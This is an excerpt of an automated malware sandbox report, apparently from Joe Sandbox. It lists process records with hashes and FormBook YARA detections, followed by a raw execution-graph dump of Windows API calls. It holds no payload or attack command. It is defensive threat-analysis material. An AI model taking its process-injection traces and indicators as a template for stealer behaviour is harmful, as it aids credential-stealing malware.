                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:6
                                                                              Start time:03:26:47
                                                                              Start date:11/01/2025
                                                                              Path:C:\Windows\SysWOW64\mobsync.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                                              Imagebase:0x50000
                                                                              File size:93'696 bytes
                                                                              MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:03:27:01
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe"
                                                                              Imagebase:0x420000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:03:27:13
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff6d20e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                                Execution Graph

                                                                                Execution Coverage:3.6%
                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                Signature Coverage:7.4%
                                                                                Total number of Nodes:1949
                                                                                Total number of Limit Nodes:169
execution_graph
94538->94543 94540 42314d 94572 3bcad1 Mailbox 94540->94572 94545 3b47b7 48 API calls 94541->94545 94544 3b4252 84 API calls 94542->94544 94546 3b4252 84 API calls 94543->94546 94547 423157 94544->94547 94576 3bc993 Mailbox __NMSG_WRITE 94545->94576 94546->94531 94548 3cf4ea 48 API calls 94547->94548 94555 423194 94548->94555 94549 3bca9d 94628 3b4907 94549->94628 94553 3b3d98 94553->93463 94553->93472 94554 3bcaa9 SetCurrentDirectoryW 94554->94572 94557 3bba85 48 API calls 94555->94557 94586 4231dd Mailbox 94557->94586 94559 4233ce 94639 3f9b72 48 API calls 94559->94639 94560 423467 94643 3f25b5 86 API calls 4 library calls 94560->94643 94563 423480 94563->94549 94565 4233f0 94640 4129e8 48 API calls ___crtGetEnvironmentStringsW 94565->94640 94567 4233fd 94568 3d1c9d _free 47 API calls 94567->94568 94568->94572 94570 42345f 94642 3f240b 48 API calls 3 library calls 94570->94642 94608 3b48dd 94572->94608 94573 3bce19 48 API calls 94573->94576 94574 3bba85 48 API calls 94574->94586 94576->94549 94576->94560 94576->94570 94576->94573 94621 3bb337 56 API calls _wcscpy 94576->94621 94622 3cc258 GetStringTypeW 94576->94622 94623 3bcb93 59 API calls __wcsnicmp 94576->94623 94624 3bcb5a GetStringTypeW __NMSG_WRITE 94576->94624 94625 3d16d0 GetStringTypeW wcstoxq 94576->94625 94626 3bcc24 162 API calls 3 library calls 94576->94626 94627 3cc682 48 API calls 94576->94627 94580 3bce19 48 API calls 94580->94586 94583 423420 94641 3f25b5 86 API calls 4 library calls 94583->94641 94585 423439 94587 3d1c9d _free 47 API calls 94585->94587 94586->94559 94586->94574 94586->94580 94586->94583 94635 3f2551 48 API calls ___crtGetEnvironmentStringsW 94586->94635 94636 3f2472 60 API calls 2 library calls 94586->94636 94637 3f9c12 48 API calls 94586->94637 94638 3cc682 48 API calls 94586->94638 94588 42344c 94587->94588 94588->94572 94590 3bbb25 94589->94590 94595 3bba98 ___crtGetEnvironmentStringsW 94589->94595 94592 3cf4ea 48 API calls 94590->94592 94591 3cf4ea 48 API calls 94594 3bba9f 
94591->94594 94592->94595 94593 3bbac8 94593->94483 94594->94593 94596 3cf4ea 48 API calls 94594->94596 94595->94591 94596->94593 94598 3b4dec 94597->94598 94601 3b4e9a 94597->94601 94599 3cf4ea 48 API calls 94598->94599 94602 3b4e1e 94598->94602 94599->94602 94600 3cf4ea 48 API calls 94600->94602 94601->94483 94602->94600 94602->94601 94603->94468 94604->94483 94605->94483 94606->94483 94607->94477 94609 3b4907 CloseHandle 94608->94609 94610 3b48e5 Mailbox 94609->94610 94611 3b4907 CloseHandle 94610->94611 94612 3b48fc 94611->94612 94612->94553 94613->94507 94614->94510 94615->94520 94616->94535 94617->94516 94644 3d1e46 94618->94644 94621->94576 94622->94576 94623->94576 94624->94576 94625->94576 94626->94576 94627->94576 94629 3b4911 94628->94629 94630 3b4920 94628->94630 94629->94554 94630->94629 94631 3b4925 CloseHandle 94630->94631 94631->94629 94632->94508 94633->94513 94634->94540 94635->94586 94636->94586 94637->94586 94638->94586 94639->94565 94640->94567 94641->94585 94642->94560 94643->94563 94645 3d1e61 94644->94645 94647 3d1e55 94644->94647 94668 3d7c0e 47 API calls __getptd_noexit 94645->94668 94647->94645 94654 3d1ed4 94647->94654 94663 3d9d6b 47 API calls 2 library calls 94647->94663 94648 3d2019 94652 3d1e41 94648->94652 94669 3d6e10 8 API calls __woutput_l 94648->94669 94651 3d1fa0 94651->94645 94651->94652 94655 3d1fb0 94651->94655 94652->94530 94653 3d1f5f 94653->94645 94656 3d1f7b 94653->94656 94665 3d9d6b 47 API calls 2 library calls 94653->94665 94654->94645 94662 3d1f41 94654->94662 94664 3d9d6b 47 API calls 2 library calls 94654->94664 94667 3d9d6b 47 API calls 2 library calls 94655->94667 94656->94645 94656->94652 94659 3d1f91 94656->94659 94666 3d9d6b 47 API calls 2 library calls 94659->94666 94662->94651 94662->94653 94663->94654 94664->94662 94665->94656 94666->94652 94667->94652 94668->94648 94669->94652 94671 3cf4ea 48 API calls 94670->94671 94672 3b6b54 94671->94672 94672->93613 94673->93615 94675 3b4c8b 94674->94675 94676 3b4d94 
94674->94676 94675->94676 94677 3cf4ea 48 API calls 94675->94677 94676->93619 94678 3b4cb2 94677->94678 94679 3cf4ea 48 API calls 94678->94679 94680 3b4d22 94679->94680 94680->94676 94683 3b4dd9 48 API calls 94680->94683 94684 3bba85 48 API calls 94680->94684 94687 3bb470 94680->94687 94715 3f9af1 48 API calls 94680->94715 94683->94680 94684->94680 94685->93622 94686->93624 94716 3b6b0f 94687->94716 94689 3bb69b 94690 3bba85 48 API calls 94689->94690 94691 3bb6b5 Mailbox 94690->94691 94691->94680 94694 3bba85 48 API calls 94706 3bb495 94694->94706 94695 42397b 94731 3f26bc 88 API calls 4 library calls 94695->94731 94698 3bb9e4 94732 3f26bc 88 API calls 4 library calls 94698->94732 94699 423973 94699->94691 94702 3bbcce 48 API calls 94702->94706 94703 423989 94704 3bba85 48 API calls 94703->94704 94704->94699 94705 423909 94708 3b6b4a 48 API calls 94705->94708 94706->94689 94706->94694 94706->94695 94706->94698 94706->94702 94706->94705 94711 3bbdfa 48 API calls 94706->94711 94714 423939 ___crtGetEnvironmentStringsW 94706->94714 94721 3bc413 59 API calls 94706->94721 94722 3bbb85 94706->94722 94727 3bbc74 48 API calls 94706->94727 94728 3bc6a5 49 API calls 94706->94728 94729 3bc799 48 API calls ___crtGetEnvironmentStringsW 94706->94729 94710 423914 94708->94710 94713 3cf4ea 48 API calls 94710->94713 94712 3bb66c CharUpperBuffW 94711->94712 94712->94706 94713->94714 94730 3f26bc 88 API calls 4 library calls 94714->94730 94715->94680 94717 3cf4ea 48 API calls 94716->94717 94718 3b6b34 94717->94718 94719 3b6b4a 48 API calls 94718->94719 94720 3b6b43 94719->94720 94720->94706 94721->94706 94723 3bbb9b 94722->94723 94726 3bbb96 ___crtGetEnvironmentStringsW 94722->94726 94724 3cee75 48 API calls 94723->94724 94725 421b77 94723->94725 94724->94726 94725->94725 94726->94706 94727->94706 94728->94706 94729->94706 94730->94699 94731->94703 94732->94699 94734 3b403c LoadImageW 94733->94734 94735 42418d EnumResourceNamesW 94733->94735 94736 3b3ee1 RegisterClassExW 94734->94736 
94735->94736 94737 3b3f53 7 API calls 94736->94737 94737->93638 94739 423c33 94738->94739 94740 3b4c44 94738->94740 94739->94740 94741 423c3c DestroyIcon 94739->94741 94740->93644 94764 3f5819 61 API calls _W_store_winword 94740->94764 94741->94740 94743 3b51cb 94742->94743 94763 3b52a2 Mailbox 94742->94763 94744 3b6b0f 48 API calls 94743->94744 94745 3b51d9 94744->94745 94746 423ca1 LoadStringW 94745->94746 94747 3b51e6 94745->94747 94750 423cbb 94746->94750 94748 3b6a63 48 API calls 94747->94748 94749 3b51fb 94748->94749 94749->94750 94751 3b520c 94749->94751 94752 3b510d 48 API calls 94750->94752 94753 3b52a7 94751->94753 94754 3b5216 94751->94754 94757 423cc5 94752->94757 94755 3b6eed 48 API calls 94753->94755 94756 3b510d 48 API calls 94754->94756 94760 3b5220 _memset _wcscpy 94755->94760 94756->94760 94758 3b518c 48 API calls 94757->94758 94757->94760 94759 423ce7 94758->94759 94762 3b518c 48 API calls 94759->94762 94761 3b5288 Shell_NotifyIconW 94760->94761 94761->94763 94762->94760 94763->93649 94764->93644 94766 3bf130 94765->94766 94768 3bfe30 331 API calls 94766->94768 94773 3bf199 94766->94773 94767 3bf595 94774 3bf431 Mailbox 94767->94774 94776 3bd7f7 48 API calls 94767->94776 94770 428728 94768->94770 94769 4287c8 94895 3fcc5c 86 API calls 4 library calls 94769->94895 94770->94773 94892 3fcc5c 86 API calls 4 library calls 94770->94892 94771 3bf418 94771->94774 94781 428b1b 94771->94781 94811 3bf6aa 94771->94811 94773->94767 94777 3bd7f7 48 API calls 94773->94777 94814 3bf229 94773->94814 94818 3bf3dd 94773->94818 94783 3fcc5c 86 API calls 94774->94783 94787 3bf537 Mailbox 94774->94787 94788 3bd6e9 55 API calls 94774->94788 94789 428b7e 94774->94789 94791 428c53 94774->94791 94794 428beb 94774->94794 94796 3bfe30 331 API calls 94774->94796 94803 3bfce0 94774->94803 94808 3c1b90 48 API calls 94774->94808 94891 3bdd47 48 API calls ___crtGetEnvironmentStringsW 94774->94891 94903 3e97ed InterlockedDecrement 94774->94903 94911 3cc1af 48 API calls 
94774->94911 94778 4287a3 94776->94778 94782 428772 94777->94782 94894 3d0f0a 52 API calls __cinit 94778->94894 94780 3bf3f2 94780->94771 94896 3f9af1 48 API calls 94780->94896 94801 428bcf 94781->94801 94802 428b2c 94781->94802 94893 3d0f0a 52 API calls __cinit 94782->94893 94783->94774 94785 3bf770 94790 428a45 94785->94790 94804 3bf77a 94785->94804 94787->93709 94788->94774 94905 40e40a 331 API calls Mailbox 94789->94905 94902 3cc1af 48 API calls 94790->94902 94910 3fcc5c 86 API calls 4 library calls 94791->94910 94792 428810 94897 40eef8 331 API calls 94792->94897 94793 3bfe30 331 API calls 94793->94811 94908 40bdbd 331 API calls Mailbox 94794->94908 94796->94774 94907 3fcc5c 86 API calls 4 library calls 94801->94907 94904 40f5ee 331 API calls 94802->94904 94803->94787 94906 3fcc5c 86 API calls 4 library calls 94803->94906 94806 3c1b90 48 API calls 94804->94806 94806->94774 94808->94774 94810 428c00 94810->94787 94909 3fcc5c 86 API calls 4 library calls 94810->94909 94811->94774 94811->94785 94811->94787 94811->94793 94811->94803 94813 428823 94813->94771 94817 42884b 94813->94817 94814->94767 94814->94771 94814->94774 94814->94818 94898 40ccdc 48 API calls 94817->94898 94818->94769 94818->94774 94818->94780 94820 428857 94822 4288aa 94820->94822 94823 428865 94820->94823 94827 4288a0 Mailbox 94822->94827 94900 3fa69d 48 API calls 94822->94900 94899 3f9b72 48 API calls 94823->94899 94824 3bfe30 331 API calls 94824->94787 94827->94824 94828 4288e7 94901 3bbc74 48 API calls 94828->94901 94831 3c479f 94830->94831 94832 3c4637 94830->94832 94833 3bce19 48 API calls 94831->94833 94834 426e05 94832->94834 94835 3c4643 94832->94835 94842 3c46e4 Mailbox 94833->94842 94980 40e822 331 API calls Mailbox 94834->94980 94912 3c4300 94835->94912 94838 3c4739 Mailbox 94838->93709 94839 426e11 94839->94838 94981 3fcc5c 86 API calls 4 library calls 94839->94981 94841 3c4659 94841->94838 94841->94839 94841->94842 94927 3ffa0c 94842->94927 94968 406ff0 94842->94968 94977 3f6524 
94842->94977 94846->93709 94847->93709 94848->93709 94849->93709 94850->93709 94851->93663 94852->93656 94853->93661 94854->93709 94855->93709 94856->93704 94857->93704 94858->93704 94860 3bfe50 94859->94860 94884 3bfe7e 94859->94884 94861 3cf4ea 48 API calls 94860->94861 94861->94884 94862 3d0f0a 52 API calls __cinit 94862->94884 94863 3c146e 94864 3b6eed 48 API calls 94863->94864 94886 3bffe1 94864->94886 94865 3e97ed InterlockedDecrement 94865->94884 94866 3bd7f7 48 API calls 94866->94884 94868 3c0509 95126 3fcc5c 86 API calls 4 library calls 94868->95126 94870 3cf4ea 48 API calls 94870->94884 94872 42a922 94872->93709 94873 42a246 94878 3b6eed 48 API calls 94873->94878 94874 3c1473 95125 3fcc5c 86 API calls 4 library calls 94874->95125 94877 3b6eed 48 API calls 94877->94884 94878->94886 94879 42a873 94879->93709 94880 42a30e 94880->94886 95123 3e97ed InterlockedDecrement 94880->95123 94882 42a973 95127 3fcc5c 86 API calls 4 library calls 94882->95127 94884->94862 94884->94863 94884->94865 94884->94866 94884->94868 94884->94870 94884->94873 94884->94874 94884->94877 94884->94880 94884->94882 94884->94886 94887 3c15b5 94884->94887 95108 3c1d10 94884->95108 95122 3c1820 331 API calls 2 library calls 94884->95122 94885 42a982 94886->93709 95124 3fcc5c 86 API calls 4 library calls 94887->95124 94888->93704 94889->93704 94890->93704 94891->94774 94892->94773 94893->94814 94894->94774 94895->94787 94896->94792 94897->94813 94898->94820 94899->94827 94900->94828 94901->94827 94902->94774 94903->94774 94904->94774 94905->94803 94906->94787 94907->94787 94908->94810 94909->94787 94910->94787 94911->94774 94913 426e60 94912->94913 94916 3c432c 94912->94916 94983 3fcc5c 86 API calls 4 library calls 94913->94983 94915 426e71 94984 3fcc5c 86 API calls 4 library calls 94915->94984 94916->94915 94924 3c4366 ___crtGetEnvironmentStringsW 94916->94924 94918 3c4435 94923 3c4445 94918->94923 94982 40cda2 82 API calls Mailbox 94918->94982 94920 3c44b1 94920->94841 94921 3cf4ea 48 
API calls 94921->94924 94922 3bfe30 331 API calls 94922->94924 94923->94841 94924->94918 94924->94921 94924->94922 94924->94923 94925 426ebd 94924->94925 94985 3fcc5c 86 API calls 4 library calls 94925->94985 94928 3ffa1c __ftell_nolock 94927->94928 94930 3ffa44 94928->94930 95062 3bd286 48 API calls 94928->95062 94986 3b936c 94930->94986 94932 3ffa5e 94933 3ffb92 94932->94933 94934 3ffb68 94932->94934 94935 3ffa80 94932->94935 94933->94838 94936 3b41a9 136 API calls 94934->94936 94937 3b936c 81 API calls 94935->94937 94938 3ffb79 94936->94938 94942 3ffa8c _wcscpy _wcschr 94937->94942 94939 3ffb8e 94938->94939 94940 3b41a9 136 API calls 94938->94940 94939->94933 94941 3b936c 81 API calls 94939->94941 94940->94939 94943 3ffbc7 94941->94943 94947 3ffab0 _wcscat _wcscpy 94942->94947 94951 3ffade _wcscat 94942->94951 94944 3d1dfc __wsplitpath 47 API calls 94943->94944 94952 3ffbeb _wcscat _wcscpy 94944->94952 94945 3b936c 81 API calls 94946 3ffafc _wcscpy 94945->94946 95063 3f72cb GetFileAttributesW 94946->95063 94949 3b936c 81 API calls 94947->94949 94949->94951 94950 3ffb1c __NMSG_WRITE 94950->94933 94953 3b936c 81 API calls 94950->94953 94951->94945 94955 3b936c 81 API calls 94952->94955 94954 3ffb48 94953->94954 95064 3f60dd 77 API calls 4 library calls 94954->95064 94957 3ffc82 94955->94957 95006 3f690b 94957->95006 94958 3ffb5c 94958->94933 94960 3ffca2 94961 3f6524 3 API calls 94960->94961 94962 3ffcb1 94961->94962 94963 3b936c 81 API calls 94962->94963 94965 3ffce2 94962->94965 94964 3ffccb 94963->94964 95012 3fbfa4 94964->95012 94967 3b4252 84 API calls 94965->94967 94967->94933 94969 3b936c 81 API calls 94968->94969 94970 40702a 94969->94970 94971 3bb470 91 API calls 94970->94971 94972 40703a 94971->94972 94973 40705f 94972->94973 94974 3bfe30 331 API calls 94972->94974 94976 407063 94973->94976 95103 3bcdb9 48 API calls 94973->95103 94974->94973 94976->94838 95104 3f6ca9 GetFileAttributesW 94977->95104 94980->94839 94981->94838 94982->94920 94983->94915 
94984->94923 94985->94923 94987 3b9384 94986->94987 95004 3b9380 94986->95004 94988 424cbd __i64tow 94987->94988 94989 3b9398 94987->94989 94990 424bbf 94987->94990 95000 3b93b0 __itow Mailbox _wcscpy 94987->95000 95065 3d172b 80 API calls 3 library calls 94989->95065 94992 424ca5 94990->94992 94995 424bc8 94990->94995 95066 3d172b 80 API calls 3 library calls 94992->95066 94993 3cf4ea 48 API calls 94996 3b93ba 94993->94996 94997 424be7 94995->94997 94995->95000 94999 3bce19 48 API calls 94996->94999 94996->95004 94998 3cf4ea 48 API calls 94997->94998 95001 424c04 94998->95001 94999->95004 95000->94993 95002 3cf4ea 48 API calls 95001->95002 95003 424c2a 95002->95003 95003->95004 95005 3bce19 48 API calls 95003->95005 95004->94932 95005->95004 95007 3f6918 _wcschr __ftell_nolock 95006->95007 95008 3f692e _wcscat _wcscpy 95007->95008 95009 3d1dfc __wsplitpath 47 API calls 95007->95009 95008->94960 95010 3f695d 95009->95010 95011 3d1dfc __wsplitpath 47 API calls 95010->95011 95011->95008 95013 3fbfb1 __ftell_nolock 95012->95013 95014 3cf4ea 48 API calls 95013->95014 95015 3fc00e 95014->95015 95016 3b47b7 48 API calls 95015->95016 95017 3fc018 95016->95017 95018 3fbdb4 GetSystemTimeAsFileTime 95017->95018 95019 3fc023 95018->95019 95020 3b4517 83 API calls 95019->95020 95021 3fc036 _wcscmp 95020->95021 95022 3fc05a 95021->95022 95023 3fc107 95021->95023 95024 3fc56d 94 API calls 95022->95024 95025 3fc56d 94 API calls 95023->95025 95026 3fc05f 95024->95026 95040 3fc0d3 _wcscat 95025->95040 95027 3d1dfc __wsplitpath 47 API calls 95026->95027 95031 3fc110 95026->95031 95032 3fc088 _wcscat _wcscpy 95027->95032 95028 3b44ed 64 API calls 95029 3fc12c 95028->95029 95030 3b44ed 64 API calls 95029->95030 95033 3fc13c 95030->95033 95031->94965 95035 3d1dfc __wsplitpath 47 API calls 95032->95035 95034 3b44ed 64 API calls 95033->95034 95036 3fc157 95034->95036 95035->95040 95037 3b44ed 64 API calls 95036->95037 95038 3fc167 95037->95038 95039 3b44ed 64 API calls 95038->95039 95041 
3fc182 95039->95041 95040->95028 95040->95031 95042 3b44ed 64 API calls 95041->95042 95043 3fc192 95042->95043 95044 3b44ed 64 API calls 95043->95044 95045 3fc1a2 95044->95045 95046 3b44ed 64 API calls 95045->95046 95047 3fc1b2 95046->95047 95067 3fc71a GetTempPathW GetTempFileNameW 95047->95067 95049 3fc1be 95050 3d3499 117 API calls 95049->95050 95052 3fc1cf 95050->95052 95051 3d35e4 __fcloseall 83 API calls 95053 3fc294 95051->95053 95052->95031 95054 3b44ed 64 API calls 95052->95054 95061 3fc289 95052->95061 95068 3d2aae 95052->95068 95053->95031 95055 3fc2b8 95053->95055 95056 3fc342 CopyFileW 95053->95056 95054->95052 95084 3fb965 118 API calls __fcloseall 95055->95084 95056->95031 95057 3fc32d 95056->95057 95057->95031 95081 3fc6d9 CreateFileW 95057->95081 95061->95051 95062->94930 95063->94950 95064->94958 95065->95000 95066->95000 95067->95049 95069 3d2aba __mtinitlocknum 95068->95069 95070 3d2aec 95069->95070 95071 3d2ad4 95069->95071 95072 3d2ae4 __mtinitlocknum 95069->95072 95073 3d4e1c __lock_file 48 API calls 95070->95073 95097 3d7c0e 47 API calls __getptd_noexit 95071->95097 95072->95052 95075 3d2af2 95073->95075 95085 3d2957 95075->95085 95076 3d2ad9 95098 3d6e10 8 API calls __woutput_l 95076->95098 95082 3fc6ff SetFileTime CloseHandle 95081->95082 95083 3fc715 95081->95083 95082->95083 95083->95031 95084->95057 95087 3d2966 95085->95087 95092 3d2984 95085->95092 95086 3d2974 95100 3d7c0e 47 API calls __getptd_noexit 95086->95100 95087->95086 95087->95092 95094 3d299c ___crtGetEnvironmentStringsW 95087->95094 95089 3d2979 95101 3d6e10 8 API calls __woutput_l 95089->95101 95099 3d2b24 LeaveCriticalSection LeaveCriticalSection _fseek 95092->95099 95093 3d2c84 __flush 78 API calls 95093->95094 95094->95092 95094->95093 95095 3d2933 __flswbuf 47 API calls 95094->95095 95096 3daf61 __flswbuf 78 API calls 95094->95096 95102 3d8e63 78 API calls 4 library calls 95094->95102 95095->95094 95096->95094 95097->95076 95098->95072 95099->95072 95100->95089 
95101->95092 95102->95094 95103->94976 95105 3f6cc4 FindFirstFileW 95104->95105 95107 3f6529 95104->95107 95106 3f6cd9 FindClose 95105->95106 95105->95107 95106->95107 95107->94838 95109 3c1d2a 95108->95109 95111 3c1ed6 95108->95111 95110 3c2357 95109->95110 95109->95111 95112 3c1e0b 95109->95112 95113 3c1eba 95109->95113 95110->95113 95131 3f9f44 58 API calls wcstoxq 95110->95131 95111->95110 95111->95113 95117 3c1e9a Mailbox 95111->95117 95118 3c1f55 95111->95118 95112->95113 95115 3c1e47 95112->95115 95112->95118 95113->94884 95115->95113 95115->95117 95121 42bfc4 95115->95121 95117->95113 95130 3d203b 58 API calls __wtof_l 95117->95130 95118->95113 95118->95117 95129 3e97ed InterlockedDecrement 95118->95129 95128 3d203b 58 API calls __wtof_l 95121->95128 95122->94884 95123->94886 95124->94886 95125->94879 95126->94872 95127->94885 95128->95113 95129->95117 95130->95113 95131->95113 95133 3b513f __NMSG_WRITE 95132->95133 95134 421b27 95133->95134 95135 3b5151 95133->95135 95136 3b6b4a 48 API calls 95134->95136 95137 3bbb85 48 API calls 95135->95137 95138 421b34 95136->95138 95139 3b515e ___crtGetEnvironmentStringsW 95137->95139 95140 3cee75 48 API calls 95138->95140 95139->93733 95141 421b57 ___crtGetEnvironmentStringsW 95140->95141 95143 3bb392 95142->95143 95150 3bb3c5 ___crtGetEnvironmentStringsW 95142->95150 95144 3bb3b8 95143->95144 95145 3bb3fd 95143->95145 95143->95150 95146 3bbb85 48 API calls 95144->95146 95147 3cf4ea 48 API calls 95145->95147 95146->95150 95148 3bb407 95147->95148 95149 3cf4ea 48 API calls 95148->95149 95149->95150 95150->93742 95151->93743 95152 3c221a 95153 3c271e 95152->95153 95154 3c2223 95152->95154 95162 3c1eba Mailbox 95153->95162 95163 3ea58f 48 API calls ___crtGetEnvironmentStringsW 95153->95163 95154->95153 95155 3b936c 81 API calls 95154->95155 95156 3c224e 95155->95156 95156->95153 95158 3c225e 95156->95158 95160 3bb384 48 API calls 95158->95160 95159 42be8a 95161 3b6eed 48 API calls 95159->95161 95160->95162 95161->95162 
95163->95159 95164 4219ba 95169 3cc75a 95164->95169 95168 4219c9 95170 3bd7f7 48 API calls 95169->95170 95171 3cc7c8 95170->95171 95177 3cd26c 95171->95177 95174 3cc865 95175 3cc881 95174->95175 95180 3cd1fa 48 API calls ___crtGetEnvironmentStringsW 95174->95180 95176 3d0f0a 52 API calls __cinit 95175->95176 95176->95168 95181 3cd298 95177->95181 95180->95174 95182 3cd2a5 95181->95182 95183 3cd28b 95181->95183 95182->95183 95184 3cd2ac RegOpenKeyExW 95182->95184 95183->95174 95184->95183 95185 3cd2c6 RegQueryValueExW 95184->95185 95186 3cd2fc RegCloseKey 95185->95186 95187 3cd2e7 95185->95187 95186->95183 95187->95186 95188 42197b 95193 3cdd94 95188->95193 95192 42198a 95194 3cf4ea 48 API calls 95193->95194 95195 3cdd9c 95194->95195 95196 3cddb0 95195->95196 95201 3cdf3d 95195->95201 95200 3d0f0a 52 API calls __cinit 95196->95200 95200->95192 95202 3cdda8 95201->95202 95203 3cdf46 95201->95203 95205 3cddc0 95202->95205 95233 3d0f0a 52 API calls __cinit 95203->95233 95206 3bd7f7 48 API calls 95205->95206 95207 3cddd7 GetVersionExW 95206->95207 95208 3b6a63 48 API calls 95207->95208 95209 3cde1a 95208->95209 95234 3cdfb4 95209->95234 95212 3b6571 48 API calls 95214 3cde2e 95212->95214 95213 4224c8 95214->95213 95238 3cdf77 95214->95238 95217 3cdea4 GetCurrentProcess 95247 3cdf5f LoadLibraryA GetProcAddress 95217->95247 95218 3cdebb 95220 3cdf31 GetSystemInfo 95218->95220 95221 3cdee3 95218->95221 95222 3cdf0e 95220->95222 95241 3ce00c 95221->95241 95224 3cdf1c FreeLibrary 95222->95224 95225 3cdf21 95222->95225 95224->95225 95225->95196 95227 3cdf29 GetSystemInfo 95229 3cdf03 95227->95229 95228 3cdef9 95244 3cdff4 95228->95244 95229->95222 95232 3cdf09 FreeLibrary 95229->95232 95232->95222 95233->95202 95235 3cdfbd 95234->95235 95236 3bb18b 48 API calls 95235->95236 95237 3cde22 95236->95237 95237->95212 95248 3cdf89 95238->95248 95252 3ce01e 95241->95252 95245 3ce00c 2 API calls 95244->95245 95246 3cdf01 GetNativeSystemInfo 95245->95246 95246->95229 95247->95218 
95249 3cdea0 95248->95249 95250 3cdf92 LoadLibraryA 95248->95250 95249->95217 95249->95218 95250->95249 95251 3cdfa3 GetProcAddress 95250->95251 95251->95249 95253 3cdef1 95252->95253 95254 3ce027 LoadLibraryA 95252->95254 95253->95227 95253->95228 95254->95253 95255 3ce038 GetProcAddress 95254->95255 95255->95253 95256 3b3742 95257 3b374b 95256->95257 95258 3b3769 95257->95258 95259 3b37c8 95257->95259 95296 3b37c6 95257->95296 95263 3b382c PostQuitMessage 95258->95263 95264 3b3776 95258->95264 95261 421e00 95259->95261 95262 3b37ce 95259->95262 95260 3b37ab DefWindowProcW 95298 3b37b9 95260->95298 95305 3b2ff6 16 API calls 95261->95305 95265 3b37d3 95262->95265 95266 3b37f6 SetTimer RegisterWindowMessageW 95262->95266 95263->95298 95268 421e88 95264->95268 95269 3b3781 95264->95269 95270 421da3 95265->95270 95271 3b37da KillTimer 95265->95271 95273 3b381f CreatePopupMenu 95266->95273 95266->95298 95310 3f4ddd 60 API calls _memset 95268->95310 95274 3b3789 95269->95274 95275 3b3836 95269->95275 95277 421da8 95270->95277 95278 421ddc MoveWindow 95270->95278 95301 3b3847 Shell_NotifyIconW _memset 95271->95301 95272 421e27 95306 3ce312 331 API calls Mailbox 95272->95306 95273->95298 95281 421e6d 95274->95281 95282 3b3794 95274->95282 95303 3ceb83 53 API calls _memset 95275->95303 95285 421dcb SetFocus 95277->95285 95286 421dac 95277->95286 95278->95298 95281->95260 95309 3ea5f3 48 API calls 95281->95309 95288 421e58 95282->95288 95293 3b379f 95282->95293 95283 421e9a 95283->95260 95283->95298 95285->95298 95289 421db5 95286->95289 95286->95293 95287 3b37ed 95302 3b390f DeleteObject DestroyWindow Mailbox 95287->95302 95308 3f55bd 70 API calls _memset 95288->95308 95304 3b2ff6 16 API calls 95289->95304 95293->95260 95307 3b3847 Shell_NotifyIconW _memset 95293->95307 95295 3b3845 95295->95298 95296->95260 95299 421e4c 95300 3b4ffc 67 API calls 95299->95300 95300->95296 95301->95287 95302->95298 95303->95295 95304->95298 95305->95272 95306->95293 95307->95299 
